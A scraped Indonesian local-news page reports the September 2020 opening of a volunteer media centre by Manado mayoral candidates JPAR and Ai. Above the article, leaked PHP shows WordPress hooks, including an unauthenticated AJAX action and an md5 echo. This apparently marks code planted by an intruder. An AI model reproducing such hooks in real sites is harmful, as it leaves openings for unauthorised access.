function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); JPAR – Ai Resmikan Media Center Relawan PAHAM Garuda One – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 19 Sep 2020 15:14 WIB ·

JPAR – Ai Resmikan Media Center Relawan PAHAM Garuda One


					JPAR – Ai Resmikan Media Center Relawan PAHAM Garuda One Perbesar

JPAR – Ai bersama pengurus tim relawan Garuda One GSVL saat berfoto bersama petaka, simbolis media center telah diresmikan.

 

MANADO – Calon Wali Kota Manado, Julyeta Paulina Amelia Runtuwene (JPAR) dan Calon Wakil Wali Kota, Harley Alfredo Benfica Mangindaan (Ai) meresmikan media center Garuda One GSVL voor PAHAM, Sabtu, (19/9/2020)

Dalam acara peresmian, JPAR mengatakan kehadiran media center Garuda One sangat berguna untuk menjalin komunikasi antara PAHAM dan masyarakat maupun dengan relawan.

“Semoga seluruh kegiatan PAHAM jelang Pilkada Desember 2020 bisa terpublikasi dengan baik dan benar lewat media center ini,” ujarnya.

Dikatakan Paula Runtuwene, jika ada masyarakat yang ingin menyampaikan aspirasi, bisa juga dilakukan lewat media center.

“Seluruh hal tentang PAHAM bisa ditanyakan di media center. Termasuk hubungan baik antara PAHAM dan masyarakat,” ujar Prof Paula.

Sementara itu, di kesempatan yang sama, Harley Mangindaan juga mengucapkan terima kasih kepada tim relawan Garuda One, yang sudah All Out melakukan dukungan untuk PAHAM.

“Saya dan Ibu Paula mengucapkan terima kasih sebesar-besarnya untuk seluruh rim relawan yang sudah berkontribusi dalam proses mengawal kemenangan kami. Terlebih untuk Garuda One yang menjadi tim relawan garis terdepan yang selalu setia bersama kami,” katanya. (AMan)

Artikel ini telah dibaca 0 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized